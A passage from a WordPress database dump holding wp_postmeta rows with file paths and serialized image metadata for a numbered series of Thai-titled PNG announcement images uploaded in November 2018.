;s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10012, 4562, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-05.png'),
(10013, 4562, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-05.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-05-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-05-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-05-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-05-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10014, 4563, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-06.png'),
(10015, 4563, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-06.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-06-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-06-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-06-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-06-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10016, 4564, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-07.png'),
(10017, 4564, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-07.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-07-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-07-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-07-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-07-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10018, 4565, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-08.png'),
(10019, 4565, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-08.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-08-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-08-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-08-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-08-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-08-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10020, 4566, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-09.png'),
(10021, 4566, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-09.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-09-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-09-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-09-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-09-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-09-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10022, 4567, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-10.png'),
(10023, 4567, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-10.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-10-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-10-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-10-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-10-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10024, 4568, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-11.png');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(10025, 4568, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-11.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-11-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-11-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-11-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-11-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10026, 4569, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-12.png'),
(10027, 4569, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-12.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-12-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-12-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-12-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-12-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-12-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10028, 4570, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-13.png'),
(10029, 4570, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-13.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-13-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-13-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-13-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-13-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10030, 4571, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-14.png'),
(10031, 4571, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-14.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-14-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-14-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-14-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-14-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-14-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10032, 4572, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-15.png'),
(10033, 4572, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-15.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-15-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-15-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-15-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-15-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-15-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10034, 4573, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-16.png'),
(10035, 4573, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-16.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-16-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-16-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-16-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-16-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-16-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10036, 4574, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-17.png'),
(10037, 4574, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-17.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-17-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-17-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-17-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-17-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-17-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10038, 4575, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-18.png'),
(10039, 4575, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-18.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-18-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-18-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-18-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-18-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-18-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10040, 4576, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-19.png'),
(10041, 4576, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-19.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-19-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-19-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-19-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-19-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-19-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10042, 4577, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-20.png'),
(10043, 4577, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-20.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-20-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-20-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-20-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-20-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-20-212x300.png\";s:5:\"